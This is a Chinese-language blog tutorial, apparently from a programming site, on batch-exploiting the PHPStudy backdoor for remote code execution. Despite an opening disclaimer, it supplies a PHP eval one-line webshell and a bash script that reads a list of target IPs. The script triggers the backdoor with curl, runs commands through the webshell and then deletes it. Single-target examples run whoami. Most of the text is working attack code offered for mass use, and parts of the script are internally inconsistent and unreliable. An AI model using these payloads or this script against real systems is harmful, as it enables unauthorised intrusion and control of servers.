首先,需要说明一下,本文严禁用于非法操作,仅用于安全研究和提高意识。对于任何因为使用本文所述方法而带来的后果,本文作者不承担任何法律责任。
- 确定漏洞版本
在使用脚本前,需要先扫描网站是否存在phpstudy后门漏洞,并确定漏洞版本,常见的版本有:
- phpstudy 2016版 v8.0
- phpstudy 2018版 v8.0
- phpstudy 2018版 v8.1
-
phpstudy 2018版 v8.2
-
获取一句话木马或webshell
在确定了漏洞版本后,需要使用一句话木马或webshell来进行攻击。常见的一句话木马有:
- php一句话木马
- asp一句话木马
- jsp一句话木马
- perl一句话木马
此处以php一句话木马为例,如下:
<?php @eval($_POST['step']);?>
将木马文件上传至目标站点,获取文件路径。
- 编写批量利用脚本
接下来,需要编写批量利用脚本,实现对漏洞网站的批量攻击。脚本示意代码如下:
#!/bin/bash
#后门路径
phpstudy_path="/phpstudy/Home/page/www/"
#webshell地址
shell_url="http://ip:port/3trophp.php"
#后门执行命令
exec_cmd="php z5h.php"
#读取ip.txt文件中的url地址
for url in $(cat ./ip.txt)
do
#执行后门,上传webshell
curl "http://${url}/${phpstudy_path}z.php?id=${exec_cmd}"
#获取webshell执行
curl "http://${url}/z5h.php" --data "step=${exec_cmd}"
#删除webshell文件
curl "http://${url}/z5h.php" --data "step=unlink(/www/z5h.php)"
#提示执行成功
echo "${url} ok!"
done
- 批量利用漏洞
执行以上脚本即可实现对存活网站的批量攻击。举两个示例说明:
- 示例1:使用以上脚本攻击ip.txt中列出的所有网站。
./phpstudy-rce.sh
- 示例2:攻击单个网站,执行whoami命令。
curl "http://target.com:8081/phpstudy/Home/page/www/z.php?id=whoami"
curl "http://target.com:8081/z5h.php" --data "step=php z5h.php"
以上就是用于PHPStudy 后门RCE 批量利用脚本的实现攻略。
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:phpstudy后门rce批量利用脚本的实现 - Python技术站